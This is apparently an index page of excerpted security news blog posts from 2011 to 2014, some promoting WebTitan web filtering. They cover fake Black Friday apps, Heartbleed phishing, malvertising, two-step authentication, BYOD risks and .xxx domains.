Are you prepared for the official start of Christmas shopping season? Will you be starting your Xmas shopping on Black Friday? If you can’t resist a bargain, and can’t wait until Cyber Monday, take care! There are many fake Black Friday deals being advertised and you may end up becoming a victim of an online scam. Fake Black Friday deals aplenty Black Friday follows Thanksgiving Day in the United States, and it officially marks the first day of the Christmas shopping season. It is also a day when online criminals try to take advantage of Christmas shoppers. There will be plenty of genuine bargains, as Black Friday discounts are offered by most major retailers. Unfortunately for shoppers, there are plenty of fake Black Friday deals being advertised online. Picking out the real deals from the fake ones is not quite as easy as it used to be. Scammers are getting good at creating highly realistic offers and fake websites. Furthermore, scammers are getting sneaky and have launched fake Android Apps, and are now sending texts containing phishing links and fake phone lines. Fake Amazon app will steal your passwords, make calls, and send texts One of the scams already being sent offers a golden opportunity: The chance to beat the online crowds and grab a bargain before everyone else. Download this app and you will get to the front of the virtual queue and get all the Amazon Black Friday deals, days early. Instead of launching an Amazon app when you start it, after downloading the fake Amazon app it will launch an app called com.android.engine. If you grant permission, as many people who download the app will, you give the app permission to view virtually everything on your phone, make calls, send texts, and see the data you enter via your phone. Deleting the app will make no difference. To avoid this scam and others like it, only download apps from Google Play store; never from third party sites. Beware of texts warning of suspicious account activity Scammers may love email to deliver phishing links and malware-ridden attachments via email, but some are now resorting to text messages. Texts are sent warning of a security breach, account hack, or other need to call a...
by G Hunt |
April 15, 2014 |
Internet Security News
The Heartbleed security vulnerability was announced recently and had IT security professionals rapidly taking action to plug security holes. System passwords were changed and alerts sent to end users telling them to do the same. Heartbleed is a highly serious data security vulnerability that was discovered in the OpenSSL cryptographic software library. It is so called because it affects a SSL extension commonly known as Heartbeat. Over half a million websites are believed to have been affected by the Heartbleed vulnerability. The Internet is normally secured with SSL/TLS encryption. This allows information to be exchanged securely by a wide range of Internet applications, including Instant Messaging (IM) services, email, and even Virtual Private Networks (VPNs). Unfortunately, the Heartbleed bug allows anyone to steal passwords even with SSL/TLS encryption in place. According to American cryptographer Bruce Schneier, Heartbleed is a potentially catastrophic security vulnerability. He recently said, “On the scale of one to 10, this is an 11.” IT departments have been frantically issuing alerts to change passwords Sensitive data is protected by passwords; however, Heartbleed has potentially allowed passwords to be compromised. The security vulnerability may have only just been discovered, but it has existed for at least two years. Hackers are not understood to have used the vulnerability to gain access to sensitive data, but it is actually rather difficult to tell even if they have. As a security measure, IT staff have been sending emails to all users advising them to change their passwords just in case. Unfortunately, they are not the only individuals sending password change requests to users. Online scammers have been piggybacking on the major data security event and have been sending emails of their own. Conveniently, also including links to allow users to rapidly address the huge security hole. Any individual who has heard about the security issue will be keen to protect themselves against hackers and cyber criminals. Emails telling them to change their passwords are likely to be clicked. Unfortunately, clicking those links will take users to a...
by G Hunt |
March 4, 2014 |
Internet Security News
Web visitors can be ultra-cautious and avoid websites that commonly contain malware. Don’t visit pornographic, gaming, betting, file-sharing, and streaming websites, and you will be able to reduce the risk of encountering malware. However, that doesn’t mean that you will never come across phishing websites and malware-ridden webpages. Even very large, reputable websites are sometimes infected. How large? How about Yahoo: One of the biggest search engines and webmail providers on the Internet. Recently Yahoo was found to contain adverts that attempted to install malware on users’ computers. Code was installed that examined users’ computers and checked to find out if the latest Java version was installed. Earlier versions of Java contained vulnerabilities that could be exploited. The latest version has fixed the security holes, but many users have not yet installed the latest version. It is estimated that as many as 2 million people visited Yahoo and had their computers infected. A great many more individuals would also have had their computers compromised had they visited the website instead of Google. In this case, the individuals behind the infections – malvertisers – were putting users’ computers to work performing bitcoin calculations: a very profitable business if you have 2 million or more computers at your disposal. Of course this is nothing new. Many websites are infected with malware. They just are usually not as big as Yahoo. However, hackers are getting bolder, and are now succeeding in infecting large websites with very good security measures in place. Advertising networks are increasingly being infiltrated by malvertisers Legitimate advertisers use advertising networks to syndicate their adverts across many thousands of websites. They are able to put their adverts in front of tens of millions of potential purchasers. Malvertisers, individuals or disreputable companies, are now doing the same. They make their adverts look respectable and get accepted by an advertising network. However, their ads contain links to malware-ridden websites, or code that probes for security vulnerabilities in users’ computers. They then inject their malware and...
by G Hunt |
January 8, 2014 |
Internet Security News
Certain types of websites are known to contain malware and carry a high risk of infecting visitors. Video streaming websites, those providing adult content, and sites run by individuals who lack an understanding of basic security controls. However, it is not only these websites that carry a risk of infecting visitors with malware. Even large sites – we are talking Yahoo and YouTube here – have allowed malware to be installed. How is this possible with websites that generate huge revenues can also be infected? The problem is not the websites themselves, but the content that is displayed on them. Malware is delivered indirectly, via the ad networks site owners sign up to or fail to block. There are a lot of unscrupulous advertisers out there, and many do not vet their customers very well. Some ad networks allow anyone to sign up. They also serve just about any kind of advert, even those containing malware or malicious links. Any visitor to those sites could potentially have their device infected. If one of those visitors is an employee of yours, your network could be in serious trouble. Ad networks can allow malware to be delivered to users’ devices An advert on a website could direct the visitor to a phishing website or one that contains multiple pieces of malware. That is not to say that the advertisers are deliberately phishing for information or want to infect visitors. They may not even be aware that their websites have been hijacked by hackers. Advertising is often a necessary evil to make websites profitable. Without advertisers, many websites would simply go out of business. To generate revenue, site owners place code on their websites that third party servers can access. Adverts are then shown to visitors to that website via text, image, or even video ads. Those third party servers potentially syndicate adverts to tens of thousands of websites, including many legitimate and well known websites. With the potential to send adverts to so many websites, ad networks are frequently targeted by cybercriminals. If they are successful, their malware can be very quickly syndicated and placed in front of tens or hundreds of thousands of individuals. In some cases,...
by G Hunt |
December 17, 2013 |
Internet Security News
In September, WebTitan launched a competition offering charities the chance to win a free WebTitan Cloud Security Solution to keep their networks protected when workers access the Internet and email. The solution is highly effective at preventing users from inadvertently accessing web contact that could cause networks or computers to be infected with malware, while protecting users from objectionable content. It also allows an organization to see what websites individual workers are attempting to access. For charitable organizations the WebTitan Cloud Security Solution offers exceptional protection, and can prevent data breaches and costly cyberattacks. The competition attracted a great many entries. All that was required to enter was for the participant to be a charity, and provide a brief answer to a very simple question: Why the organization would benefit from winning a free WebTitan Cloud Security Solution The WebTitan Cloud Competition Winner Is… Touch Life of Uganda The first prize in the competition was well worth winning: A WebTitan Cloud web security license valued at $8,000! The prize could not have gone to a worthier winner. Touch Life is a Non-Government Organization (NGO) operating in Uganda. The charitable organization performs important and incredibly valuable work, assisting families that have been torn apart by war, famine, disease, and have been forced to live a life of extreme poverty. The charity empowers those families to take control of their lives and gives them hope. In an ideal world, the websites of charities would be exempt from cyberattacks. Yet sadly their websites are no different to global corporations earning profits in the billions. Cybercriminals often conduct random campaigns, and the reality is charities are often targeted simply for having poor security controls. If there is money to be made from attacking a website, those websites will be attacked. In fact, cybercriminals often take advantage of natural disasters, famine, and war to obtain donations intended to help victims. However, the Internet is vital for charities to spread news about the excellent work they perform and attract donations. Without those donations they...
by G Hunt |
April 24, 2013 |
Internet Security News
Twitter has suffered two major security breaches that have exposed the login credentials of hundreds of thousands of its users. In response to the incident, a number of additional security controls have been considered. The best solution was deemed to be the addition of a two-step authentication process. This will not guarantee another data breach will be prevented, but it will make sure that it becomes a lot harder for hackers to gain access to login credentials. The new controls are likely to put off all but the most skilled and determined cybercriminals from attacking Twitter in the future. There will be much easier targets they can attack. Two-step authentication is an important security control. In order to create an account, a user must sign up and create a login name and a password. The second step in the process, which will shortly be added to Twitter, is the requirement to have a code sent to an email address, mobile phone or the Twitter app. The additional control will log the user’s device. If another device is used to login, another code will be sent to the app, phone or email account used to register. If the code is not entered, access to the account will not be permitted. Wired.com has recently reported that Twitter is in the process of testing the new security measure before making it live. Once testing has been completed it will be rolled out to all accounts. This will not come a moment too soon. Cybercriminals are targeting social media networks, and if security measures are inadequate, data breaches will be suffered. Social Media Networks are an Attractive Target for Cybercriminals The networks are a big target for hackers and cybercriminals. The data stored in user accounts can be considerable. The data can be used to conduct highly effective spear phishing campaigns. With detailed information about each user, those campaigns can be very convincing. Criminals can use stolen data to craft emails that the user is likely to respond to. They can find out who their contacts are, and make an email appear that it has been sent by a friend. That makes it far more likely that the target will click a phishing link or open an infected attachment. Not...
by G Hunt |
February 20, 2013 |
Internet Security News
Bring Your Own Device (BYOD) is increasing in popularity. Employers love it: They can leverage the power of Smartphones, tablets and laptops, without having to pay the huge cost of supplying the devices to all staff members. BYOD can lead to a major increase in productivity, improve efficiency, and the devices facilitate better collaboration. They make communication so much easier. That said, they do raise a number of security concerns, so much so that many security experts believe the acronym should stand for “Bring Your Own Doom”, or “Breach Your Own Data.” By running such a scheme are you just introducing unnecessary data security risks? Would it be better to bite the bullet and supply mobile devices to exercise greater control? Employees are not necessarily careful with corporate data stored on their devices Employees engage in risky online behavior. They fail to implement even basic security controls on their own devices and are prone to losing them. If the devices are used to store corporate data, this is a major security risk. Even with the risks posed by allowing the devices to be used at work, a Fortinet survey recently revealed 74% of organizations in the United States have adopted BYOD. The survey was conducted on 3,800 employees, half of whom believed bringing their own devices to work was a basic human right. In actual fact is it a privilege. The figures would be surprising were it not for the fact that all of the respondents were in their early twenties, many of whom had only just started their first job. Young adults, often referred to as Generation Y, are tech-savvy and have grown up in an environment with a myriad of electronic devices at their disposal. They are heavily reliant on this technology. This is good news as it means they are able to use a wide range of devices competently; they know their way around a computer and are easy to train. On the downside they are perhaps too reliant on their mobile devices and use them too much to communicate. Take those devices away and they are at a loss. Employers have realized that this technical expertise can be leveraged to improve efficiency in the workplace. They are also the CEOs, CISOs and...
by G Hunt |
December 12, 2012 |
Internet Security News
It is now possible to search the internet more securely and also avoid objectionable content without having to install a web filtering solution or parental controls. Google has added greater protection to its search engine to filter out undesirable webpages. Users of Google.com will no longer have the option of choosing a moderate level of content. The choice is now a yes or no. They can “filter explicit content” or not, and account holders can also lock the setting in place. This will undoubtedly please many parents who will be able to easily add a filter to prevent their children from being displayed content of an adult nature, but not everyone is happy. The news broke via Reddit and many internet users have reacted angrily over the censorship that is now placed on searches by Google SafeSearch. Google SafeSearch is not sufficient protection for businesses, schools and colleges The major search engines are well aware that there are a lot of websites containing adult or otherwise explicit content on the Internet and most now offer an option to filter search results to prevent certain sites from being displayed. When set to their various safe modes, they will limit the search results for general search terms. This is fine for home use but it is not sufficient protection for schools, colleges and business use. The function can be used of course, but it will need to be set on each individual computer or browser, and the controls are easy to navigate around. They will only prevent content from inadvertently being displayed in the search results. If a student or member of staff wants to access explicit content, it is easy to bypass the controls or turn them off. Oftentimes these filters are overactive and prevent some legitimate websites from being displayed. It may not be possible for students or teachers to view classic literature or works of art. Some will be deemed to be sexually explicit. The answer in this case is not to use the search engine functions to filter content, but to employ a powerful web filtering solution such as WebTitan. WebTitan allows a system administrator to fine tune the web filter to ensure that adult and other objectionable content...
by G Hunt |
October 31, 2012 |
Internet Security News
On November 1, 2012, SpamTitan Technologies will be releasing WebTitan 4.0, the latest version of the powerful web filtering solution for business customers. The new version includes a host of additional features to make it easier than ever before for system administrators to manage Internet usage in the workplace and protect their networks from malware, viruses and cyberattacks. The latest version includes new controls to manage bandwidth, with advanced reporting features, delegated administration, full transport authentication, and SNMP support. SpamTitan Technologies WebTitan 4.0 also boasts improved white labeling options. Proxy mode now offers full transparent authentication When developing WebTitan 4.0, product developers took on board comments from users and incorporated a host of new features to make management easier. The result is the most user-friendly version released to date and includes augmented controls to ensure businesses are better protected. WebTitan 4.0 offers full transparent authentication when using the product in proxy mode. Users are able to generate advanced reports, as opposed to previous versions when reporting options for transparent proxies was IP based. Administration functions can be easily configured New delegated administration functionality has been added to reduce the burden on system administrators. Now the administration of WebTitan can be passed over to any stakeholder in the organization. All controls can be easily configured and individual users can be granted reporting rights, policy management privileges with the option of setting reporting rights to allow individuals to issue Internet usage reports for specific users or user groups. When administrator rights have been configured, it is possible for reporting and policy management responsibilities to be delegated to individuals who have a better understanding of the best web filtering policies for specific groups of users, ensuring much improved cross-organizational participation. Ensure enough bandwidth is available for business-critical applications The latest version offers a host of improved corporate Internet policy functions to ensure that sufficient bandwidth...
by G Hunt |
October 15, 2012 |
Internet Security News
A recent survey conducted by SpamTitan Technologies indicates the vast majority of companies are prepared to terminate the contracts of employees for inappropriate social media use, such as exposing confidential data on social media networks. The corporate social media usage study showed that 87% of respondents would consider firing an employee for inappropriate social media use if company policies were violated. Only 16% of companies think social media use at work is acceptable The use of social media channels during work time is frowned upon by most companies. Many turn a blind eye to a little social media time during the working day, but only 16% of organizations taking part in the study said that they actually think it is acceptable for the staff to spend some time on Facebook, Twitter, LinkedIn and other social media networks. The threat of termination of employment contracts for misuse of social media, in particular the posting of confidential information or disparaging remarks about an employer, is not an empty one. According to a study conducted by Osterman Research, one company in six has already made the decision to terminate at least one employee’s contract for inappropriate use of social media in the workplace. With the rise in popularity of websites such as Facebook, Twitter and LinkedIn, it is understandable that members of staff with Internet access are tempted to spend a little of their working day checking their accounts. For many employers the main issue is not the loss of productivity that occurs as a result of inappropriate social media use. It is the security threat that inappropriate social media use introduces. Malware is rife on Facebook Social media websites are a honeypot for cybercriminals and malware is rife on the sites. Online criminals trawl Facebook, Twitter and LinkedIn looking for corporate data, while phishers seek information that can be used to conduct spear phishing campaigns. Twitter now has 145 million active users and Facebook has 845 million users around the world. Many of these users are accessing their accounts during working hours too. Osterman discovered that 36% of employees use part of their working day to check...
by G Hunt |
February 21, 2012 |
Internet Security News
A new study recently published by Osterman Research indicates there are major Facebook malware risks that many companies are not aware of. Furthermore, those risks are very real. 24% of companies have discovered malware has affected their corporate Facebook pages. The risk of malware affecting corporate social media pages is considerable, with Facebook the main social media network that has been attacked by criminal gangs. LinkedIn and Twitter can also be risky, but only 7% of companies have had their Twitter and LinkedIn accounts infected. The problem could actually be far worse. The study revealed that many IT security professionals were not even aware if their social media accounts had been hacked or infected with malware because they never check. Employees social media use during working hours has increased significantly Researchers at Osterman discovered the use of social media sites by employees during working hours had increased significantly over the past year. The survey results revealed that 36% of employees of corporations were accessing their Facebook accounts during office hours. Last year the figure stood at just 28%. Use of Twitter during working hours is also increasing. Last year, 11% of employees were using Twitter at work, while this year the figure has risen to 17%. The same is true for LinkedIn, with employee use rising from 22% to 29% over the same period. Employees are a major risk to corporate network security It is clear is that social media accounts are being targeted by hackers and cybercriminals; and, as the sites grow in popularity, the problem is only likely to get worse. Furthermore, when employees access social media sites at work they could be placing corporate networks at risk. As more employees use social media sites during working hours, and more time is spent by individuals on those sites, the risk to data security increases. Personal information is being shared on the sites, but some employees are also sharing corporate information. Sometimes this is deliberate, other times potentially sensitive data is unwittingly shared. Criminals trawl social media websites looking for information to launch spear phishing campaigns A...
by G Hunt |
August 15, 2011 |
Internet Security News
There was a buying frenzy following the release of the new .xxx suffixed domains. Pornographers, Internet marketers and entrepreneurs competed to secure the hottest and rudest of them. The first of the .xxx websites have now gone live, there has been further talk about compartmentalization of the Internet, with the possibility of all pornographic websites being confined to those sites with a .xxx suffix. However, will the .xxx domains make web filtering pornography any easier? ICAN releases .xxx domains for sale The Internet Corporation for Assigned Names or ICANN as it is better known, created the new top-level Internet domain specifically for websites of an adult nature. The long term view was to eventually move all pornographic websites to the xxx domains. This could clean up the Internet and make it much easier for parents and businesses to block pornographic websites. It is, after all, much easier to block a single domain type than to implement web filtering to prevent all websites containing pornographic material from being viewed. IT security professionals and individuals who want to stop porn from being accessible via their computers, phones, and tablets could therefore just block the xxx extension. There is a problem of course. Owners of adult websites have been buying up new domain names in the thousands, but will they redirect their current .com, .co.uk, .org and .net sites to the new .xxx domains? Of course they won’t. They’ve just been given even more domain names to fill with pornography, and any redirects are likely to come from the .xxx domain names back to their main, well-established websites. Unless laws are introduced to force purveyors of adult content over to the new domains, the online adult entertainment industry will simply not make the switch. Some firms will undoubtedly activate their new xxx websites, but unless everyone does, the initiative will be seen to have failed and web filtering pornography will be no easier. Will the XXX domains make web filtering pornography any easier? Potentially, the creation of the new domain will make it easier to filter some adult sites, so it will make the job of web filtering a little easier....